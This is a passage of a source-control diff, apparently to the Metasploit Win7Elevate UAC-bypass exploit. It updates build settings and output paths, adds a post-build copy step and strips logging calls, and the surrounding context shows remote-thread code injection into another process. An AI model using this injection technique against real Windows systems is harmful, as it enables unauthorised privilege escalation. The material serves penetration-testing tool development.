{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.Build.0 = Debug|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
|
BIN
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp
vendored
Normal file → Executable file
BIN
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp
vendored
Normal file → Executable file
Binary file not shown.
17
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc
vendored
Normal file → Executable file
17
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc
vendored
Normal file → Executable file
|
@ -61,22 +61,23 @@ END
|
||||||
|
|
||||||
#ifdef _DEBUG
|
#ifdef _DEBUG
|
||||||
|
|
||||||
|
// Z:\code\metasploit-framework\external\source\exploits\bypassuac\TIOR\Debug\Win32
|
||||||
#ifdef _WIN64
|
#ifdef _WIN64
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\x64\\Win7ElevateDll.x64.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\x64\\TIOR.x64.exe"
|
||||||
#else
|
#else
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\Win32\\Win7ElevateDll.x86.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\Win32\\TIOR.x86.exe"
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
#else // _DEBUG
|
#else // _DEBUG
|
||||||
|
|
||||||
#ifdef _WIN64
|
#ifdef _WIN64
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\x64\\Win7ElevateDll.x64.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\x64\\TIOR.x64.exe"
|
||||||
#else
|
#else
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\Win32\\Win7ElevateDll.x86.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\Win32\\TIOR.x86.exe"
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -63,25 +67,30 @@
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -96,10 +105,12 @@
|
||||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -119,10 +130,12 @@
|
||||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -141,12 +154,14 @@
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -155,6 +170,9 @@
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
</ResourceCompile>
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -168,12 +186,14 @@
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -182,6 +202,9 @@
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
</ResourceCompile>
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="Resource.h" />
|
<ClInclude Include="Resource.h" />
|
||||||
|
@ -204,7 +227,10 @@
|
||||||
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ResourceCompile Include="Win7Elevate.rc" />
|
<ResourceCompile Include="Win7Elevate.rc">
|
||||||
|
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WIN64;_WIN64;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
<ImportGroup Label="ExtensionTargets">
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
|
35
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp
vendored
Normal file → Executable file
35
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp
vendored
Normal file → Executable file
|
@ -209,7 +209,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (codeStartAdr >= codeEndAdr)
|
if (codeStartAdr >= codeEndAdr)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Unexpected function layout");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -220,7 +219,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
|
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Couldn't get path to self");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -231,7 +229,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (S_OK != hr)
|
if (S_OK != hr)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"SHGetFolderPath failed");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -240,7 +237,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (hModKernel32 == 0)
|
if (hModKernel32 == 0)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Couldn't load kernel32.dll");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -257,7 +253,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
|| 0 == tfpWaitForSingleObject.f)
|
|| 0 == tfpWaitForSingleObject.f)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Couldn't find API");
|
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
|
@ -374,26 +369,11 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
|
|
||||||
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
|
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
|
||||||
|
|
||||||
if (reme.AnyFailures())
|
if (!(reme.AnyFailures()))
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Remote allocation failed");
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
{
|
||||||
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
|
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
|
||||||
|
|
||||||
if (hRemoteThread == 0)
|
if (hRemoteThread != 0)
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
L"Couldn't create remote thread",
|
|
||||||
L"CreateRemoteThread"));
|
|
||||||
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
{
|
||||||
if ( Redirector )
|
if ( Redirector )
|
||||||
Redirector();
|
Redirector();
|
||||||
|
@ -415,7 +395,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
|
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
|
|
||||||
// See if it completed before the user asked to stop waiting.
|
// See if it completed before the user asked to stop waiting.
|
||||||
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
|
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
|
||||||
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
|
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
|
||||||
|
@ -442,14 +421,4 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
|
|
||||||
FreeLibrary(hModKernel32);
|
FreeLibrary(hModKernel32);
|
||||||
|
|
||||||
if (bThreadWaitFailure)
|
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Error waiting on the remote thread to complete");
|
|
||||||
}
|
|
||||||
else if (bThreadWaitSuccess)
|
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
|
|
||||||
CLogger::LogLine(L"Remote thread completed");
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
16
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp
vendored
Normal file → Executable file
16
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp
vendored
Normal file → Executable file
|
@ -33,7 +33,6 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
|
||||||
if (hSnapshot == INVALID_HANDLE_VALUE)
|
if (hSnapshot == INVALID_HANDLE_VALUE)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
|
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
|
@ -61,17 +60,7 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
|
||||||
{
|
{
|
||||||
DWORD dwErr = GetLastError();
|
DWORD dwErr = GetLastError();
|
||||||
|
|
||||||
if (ERROR_NO_MORE_FILES != dwErr)
|
if ((ERROR_NO_MORE_FILES == dwErr) && !(mapProcs.empty()))
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Process32Next/First failed");
|
|
||||||
}
|
|
||||||
else if (mapProcs.empty())
|
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Process32Next/First returned nothing");
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
{
|
||||||
bResult = true;
|
bResult = true;
|
||||||
}
|
}
|
||||||
|
@ -107,7 +96,6 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
|
||||||
if (szProcName == NULL)
|
if (szProcName == NULL)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"No process name passed in");
|
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -140,7 +128,7 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
|
||||||
}
|
}
|
||||||
|
|
||||||
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(strMsg);
|
|
||||||
|
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
